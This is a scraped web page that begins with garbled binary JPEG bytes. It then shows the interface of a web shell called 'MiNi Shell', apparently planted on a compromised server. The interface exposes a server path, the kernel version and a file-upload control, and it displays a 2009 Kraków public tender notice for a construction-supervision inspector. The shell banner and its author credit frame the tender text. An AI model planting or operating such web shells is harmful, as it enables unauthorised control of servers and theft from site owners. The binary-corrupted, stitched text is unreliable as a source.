JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090731/262768-N-2009.html

<p class="kh_header"><b>Kraków: pełnienie funkcji inspektora nadzoru inwestorskiego dla robót instalacyjnych (z wyjątkiem instalacji i sieci elektrycznych) związanych z budową DPS dla Osób Uzależnionych przy ul. Rozrywka 1 w Krakowie</b><br>
<b>Numer ogłoszenia: 262768 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie funkcji inspektora nadzoru inwestorskiego dla robót instalacyjnych (z wyjątkiem instalacji i sieci elektrycznych) związanych z budową DPS dla Osób Uzależnionych przy ul. Rozrywka 1 w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Pełnienie funkcji inspektora nadzoru inwestorskiego dla robót instalacyjnych (z wyjątkiem instalacji i sieci elektrycznych) związanych z budową Domu Pomocy Społecznej dla Osób Uzależnionych przy ul. Rozrywka 1 w Krakowie,

1. Obowiązki inspektora nadzoru inwestorskiego 
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2003 r. 
Nr 207, poz. 2016 z póź. zm.), a w szczególności:
1)	Sprawdzanie kosztorysów przekazanych przez Zamawiającego i potwierdzanie ich zgodności pod względem rachunkowym i merytorycznym, z obowiązującymi zasadami kosztorysowania oraz zastosowania średnich cen wg aktualnych na dzień opracowania katalogów SEKOCENBUD-u.
2)	Reprezentowania Zamawiającego na placu budowy przez sprawowanie kontroli zgodności jej realizowania z przepisami, obowiązującymi Polskimi Normami, dokumentacją budowlano - wykonawczą oraz zasadami wiedzy technicznej.
3)	Każdorazowe podejmowanie stosownych działań wynikających z przepisów prawa (w tym w szczególności Ustawy Prawo budowlane) w razie stwierdzenia występowania nieprawidłowości i zagrożeń na budowie, w tym związanych z katastrofą budowlaną. W razie zagrożenia wystąpienia oraz w przypadku stwierdzenia katastrofy budowlanej inspektor nadzoru zobowiązany jest do natychmiastowego podjęcia stosownych działań. W przypadku stwierdzenia katastrofy budowlanej inspektor nadzoru podejmie działania, w imieniu Zamawiającego, zgodnie z zapisem w art. 75 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane, bez konieczności wcześniejszej konsultacji z Zamawiającym.
4)	Sprawdzanie jakości wykonywanych robót, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, nie dopuszczonych do obrotu i stosowania w budownictwie.
5)	Sprawdzanie i odbiór robót ulegających zakryciu lub robót zanikających, uczestniczenie w czynnościach odbioru końcowego przedmiotu umowy i przekazanie go do użytkowania.
6)	Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad robót budowlanych,
7)	Uczestniczenie w naradach koordynacyjnych w trakcie realizacji robót,
8)	Sprawdzanie dokumentacji powykonawczej oraz wszystkich dokumentów dostarczonych przez wykonawcę robót pod względem kompletności i treści merytorycznej, 
9)	Sprawowanie nadzoru nad usuwaniem usterek wynikłych w okresie gwarancyjnym,
10)	Udział we wprowadzeniu wykonawcy na plac budowy i odbiorach robót instalacyjnych,
11)	Dokonywanie wpisów w dzienniku budowy, kontrola dziennika budowy,
12)	Sporządzanie protokołów konieczności wykonania robót dodatkowych i uzupełniających,
13)	Sprawdzanie czy wbudowane materiały posiadają odpowiednie atesty, certyfikaty i gwarancje, odbiór tych dokumentów  podczas odbioru końcowego robót,
14)	Wizytowanie prowadzonych budów w częstotliwości gwarantującej prawidłową ich kontrolę, w tym bezwzględnie każdorazowo przy odbiorach robót zanikających lub ulegających zakryciu. W razie konieczności wizyty mają być potwierdzone wpisami do dziennika budowy,
15)	Każdorazowe wizytowanie budowy na wezwanie Zamawiającego (w tym również telefoniczne oraz przesłane pocztą elektroniczną),
16)	Każdorazowe wizytowanie obiektów, gdzie wykonywane były prace objęte nadzorem, na wezwanie Zamawiającego (w tym również telefoniczne oraz przesłane pocztą elektroniczną) w czasie trwania rękojmi udzielonej przez wykonawcę robót. Koszty z tym związane mają być uwzględnione w stawce za nadzór. Zamawiający przewiduje, że w okresie rękojmi na prace wykonywane w roku 2009 będzie miało miejsce ok. 10 tego typu wizyt.
17)	Kontrola poprawności wykonania robót pod kątem zgodności z przekazaną dokumentacją projektową i umową zawartą na ich wykonanie, 
18)	Każdorazowe, niezwłoczne zgłaszanie Zamawiającemu wszelkich trudności i problemów wynikłych w trakcie realizacji nadzorowanych prac, w tym w szczególności wszystkich przerw i opóźnień w wykonywaniu prac, trwających powyżej 3 dni.

2. Prawa inspektora nadzoru inwestorskiego 
1)	Wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonania prób i badań, także tych wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów i urządzeń technicznych.
2)	Żądanie od kierownika budowy lub kierownika robót budowlanych dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także ich wstrzymania w przypadku gdy kontynuacja może stanowić zagrożenie dla życia lub zdrowia, bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.

3. Zasady realizacji przedmiotu zamówienia 
1)	Inspektor nadzoru jest przedstawicielem Zamawiającego w stosunkach z wykonawcą robót budowlanych i instalacyjnych.
2)	Inspektor nadzoru nie jest upoważniony do zlecania Wykonawcy robót dodatkowych nie wynikających z umowy.
3)	Czas pełnienia funkcji nadzoru inwestorskiego zaczyna się z dniem przekazania obiektu Wykonawcy do wykonywania robót budowlanych i kończy się z dniem odbioru końcowego robót, bez wad.
4)	Inspektor nadzoru ponosi odpowiedzialność za ewentualne niewłaściwe wykonywanie swoich obowiązków zarówno, jeżeli skutki jego błędów zostaną stwierdzone na etapie prowadzenia robót, jak i eksploatacji.
5)	W przypadku jakichkolwiek kontaktów inspektora nadzoru, związanych z pełnieniem przez niego swojej funkcji z osobami trzecimi, w tym w szczególności z wykonawcami robót, wszelkie ustalenia w tej sprawie mają być przekazywane pisemnie Zamawiającemu.
6)	Inspektor nadzoru ponosi odpowiedzialność za ewentualne niewłaściwe wykonywanie swoich obowiązków zarówno, jeżeli skutki jego błędów zostaną stwierdzone na etapie budowy, jak i eksploatacji budynku Domu Pomocy Społecznej. 
7)	Inspektor nadzoru zobowiązany jest do zapoznania się ze stanem budowy oraz jej dokumentacją przed złożeniem oferty. Zamawiający ustala termin wizji lokalnej na dzień 5 sierpnia 2009 r. o godz. 12:00
8)	W przypadku kontaktów inspektora nadzoru z projektantem budynku Domu Pomocy Społecznej przy ul. Rozrywka oraz z wykonawcą robót budowlanych, wszelkie ustalenia mają być przekazane Zamawiającemu w formie pisemnej (dopuszcza się przesłanie faksem oraz pocztą elektroniczną). Dotyczy to kontaktów pisemnych, wzajemnych ustaleń, spotkań i konsultacji a także podejmowania wspólnych działań dotyczących realizacji inwestycji przy ul. Rozrywka 1. W przypadku nie wywiązania się Wykonawcy  z w/w wymogu, Zamawiający zastrzega sobie możliwość natychmiastowego rozwiązania umowy i obciążenia inspektora nadzoru karą umowną w wysokości 50% wartości umowy
9)	Inspektor nadzoru nie może zatwierdzać żadnych zmian w dokumentacji projektowej, jeżeli nie zaakceptuje ich upoważniony przedstawiciel projektanta i Zamawiającego.
10)	Nadzorem inwestorskim, stanowiącym przedmiot niniejszego zamówienia, objęta jest całość robót dotyczących instalacji i sieci, związana z budową Domu Pomocy Społecznej  przy ul. Rozrywka 1 w Krakowie, zgodnie z zakresem objętym dokumentacją projektową, z wyłączeniem robót dotyczących sieci, instalacji i urządzeń elektrycznych. 
11)	Wynagrodzenie dla inspektora nadzoru wypłacane będzie w systemie kwartalnym, wg rzeczywistej ilości czasu nadzoru w okresie rozliczeniowym, z zastrzeżeniem pkt. 12. Rachunki lub faktury dostarczane będą Zamawiającemu na 14 dni przed końcem każdego kwartału. 
12)	Wynagrodzenie częściowe zostanie wypłacone na konto inspektora nadzoru lub w kasie Zamawiającego w terminie do 14 dni od daty przyjęcia rachunku lub faktury. Ostatnia transza wynagrodzenia zostanie wypłacona  po odbiorze końcowym robót budowlanych bez wad i przekazaniu Zamawiającemu zatwierdzonego do wypłaty pod względem merytorycznym i rachunkowym kosztorysu zamiennego, certyfikatów i atestów wymaganych w związku z wbudowanymi materiałami i urządzeniami, gwarancji oraz protokołów niezbędnych pomiarów i badań technicznych wykonanych i dostarczonych przez wykonawcę robót budowlanych.
13)	Wysokość wynagrodzenia w okresie rozliczeniowym będzie wyliczona na podstawie czasu pełnienia funkcji nadzoru inwestorskiego oraz stawki wynagrodzenia za tydzień nadzoru określonej w ofercie Wykonawcy. W przypadku niepełnych tygodni pełnienia funkcji nadzoru inwestorskiego stawka wynagrodzenia za 1 dzień będzie wynosiła 20% stawki tygodniowej. W przypadku stwierdzenia usterek lub wad robót budowlanych, w okresie eksploatacji obiektu, wykrytych w czasie obowiązywania udzielonej przez wykonawcę robót rękojmi i gwarancji, inspektor nadzoru będzie zobowiązany do udziału w wizjach lokalnych, bez ponoszenia przez Zamawiającego dodatkowych kosztów. Zamawiający poda termin wizji z wyprzedzeniem co najmniej 3 dni roboczych. W przypadku nie stawienia się inspektora nadzoru na wizji, zostanie naliczona kara umowna w wysokości stawki tygodniowej wynagrodzenia. W przypadku usterek i wad zagrażających bezpieczeństwu użytkowania obiektu, inspektor nadzoru ma obowiązek stawić się w obiekcie, na wezwanie Zamawiającego, najszybciej jak to możliwe.
14)	Czas pełnienia funkcji nadzoru inwestorskiego liczony jest jako wyłącznie czas prowadzenia robót objętych nadzorem w ramach niniejszego zamówienia. Do czasu pełnienia funkcji nadzoru inwestorskiego nie wlicza się  czasu od dnia zgłoszenia przez wykonawcę robót budowlanych o zakończeniu prac do dnia przystąpienia do odbioru robót oraz dni ustawowo wolnych od pracy przypadających od poniedziałku do piątku. W przypadku gdy w trakcie odbioru robót wykryte zostaną wady do czasu pełnienia funkcji nadzoru inwestorskiego wliczany jest czas od dnia odbioru robót, w trakcie którego wykryte zostały wady do dnia odbioru końcowego bez wad. Do czasu pełnienia funkcji inspektora nadzoru wlicza się również dni dokonywania odbiorów. Do czasu pełnienia funkcji inspektora nadzoru inwestorskiego nie wlicza się okresu przerw w realizacji robót budowlanych. 
15)	W razie urlopu inspektor nadzoru zobowiązany jest zapewnić zastępstwo na swoje miejsce. Osoba zastępująca musi posiadać stosowne uprawnienia i kwalifikacje. Zgoda na zastępstwo musi być wyrażona pisemnie przez Zamawiającego. Warunki współpracy z zastępcą muszą być ustalone z Zamawiającym i zatwierdzone przez Zamawiającego. Inspektor nadzoru odpowiada za wszystkie działania osoby wyznaczonej na jego zastępstwo. Łączny czas zastępstwa w ciągu roku nie może wynosić więcej niż 3 tygodnie.
16)	Inspektor nadzoru zobowiązany jest posiadać telefon komórkowy i udostępnić jego numer Zamawiającemu.
17)	Inspektor nadzoru zobowiązany jest posiadać adres poczty elektronicznej i udostępnić go Zleceniodawcy.

4.  Warunki dodatkowe:
1)	Wykonawca jest związany ofertą przez 30 dni licząc od upływu terminu składania ofert,
2)	Cena oferty określona stosownie do wymagań specyfikacji zawiera wszystkie koszty realizacji zamówienia,
3)	Zamawiający wymaga, aby Wykonawca zawarł umowę na warunkach określonych we wzorze umowy stanowiącym załącznik nr 1 do siwz, w terminie określonym przez Zamawiającego w wezwaniu do jej podpisania,
4)	Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki, które muszą spełniać wykonawcy biorący udział w postępowaniu określone są w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2007 r. nr 223, poz. 1655, z późn. zm.)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda przedstawienia następujących dokumentów:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, określające pełna nazwę, status prawny i dokładny adres firmy, potwierdzające, że Wykonawca jest uprawniony do występowania w obrocie prawnym.
Zaświadczenie winno jednoznacznie wskazywać osobę/y upoważnioną/e do dokonywania czynności prawnych w imieniu Wykonawcy (należyta reprezentacja). Wykonawca posiadający siedzibę poza granicami Rzeczypospolitej Polskiej zamiast w/w dokumentu winien złożyć dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Zaświadczenie winno jednoznacznie wskazywać osobę/y upoważnioną/e do dokonywania czynności prawnych w imieniu Wykonawcy (należyta reprezentacja).
W przypadku:
1)	podmiotów posiadających osobowość prawną jak i spółek prawa handlowego nie posiadających osobowości prawnej - wyciąg z rejestru sądowego,
2)	osób fizycznych wykonujących działalność gospodarczą - zaświadczenie o wpisie do ewidencji działalności gospodarczej,
3)	wspólnego ubiegania się wykonawców o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
UWAGA
Dokument nie jest wymagany od wykonawców nie prowadzących działalności gospodarczej
2.	Pełnomocnictwo osoby/osób podpisującej/podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, gdy nie wynika to z w/w dokumentów. W przypadku udzielenia pełnomocnictwa, wymagana jest forma i rodzaj pełnomocnictwa  właściwy do poszczególnych czynności.
3.	Wykaz osób, które będą odpowiedzialne za wykonywane zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z zakresem wykonywanych przez nich czynności. (Uwaga: W przypadku wykonywania przedmiotu zamówienia osobiście  - wpisać stosowną adnotację.)
4.	Uprawnienia niezbędne do wykonania określonych prac lub czynności w zakresie określonym w przedmiocie zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (odpis decyzji o nadaniu uprawnień oraz aktualne zaświadczenie z właściwej izby samorządu zawodowego, stosownie do części zamówienia, na którą Wykonawca składa ofertę), tj. uprawnienia do kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz zaświadczenie, że Wykonawca jest członkiem właściwej Okręgowej Izby Inżynierów Budownictwa. 

UWAGA:
-	Wymienione dokumenty muszą być aktualne na dzień składania ofert.
-	W przypadku dokumentów wymienionych w ust 1 za aktualne uważa się dokumenty wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
-	Wykonawca jest zobowiązany przedłożyć dokumenty zgodne ze stanem faktycznym. 
-	Wniosek o zmianę wpisu w dokumencie kierowany do stosownego urzędu nie stanowi dokumentu w rozumieniu Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane.
-	Wykonawca zobowiązany jest złożyć oryginały lub kserokopie dokumentów poświadczonych za zgodność z oryginałem przez Wykonawcę. W przypadku pełnomocnictwa Wykonawca zobowiązany jest przedłożyć oryginał, odpis notarialny lub kserokopię potwierdzoną za zgodność odpisu z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?id=9652.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Jżóefińska 14, pok. 002.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2009 godzina 10:00, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Jżóefińska 14,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com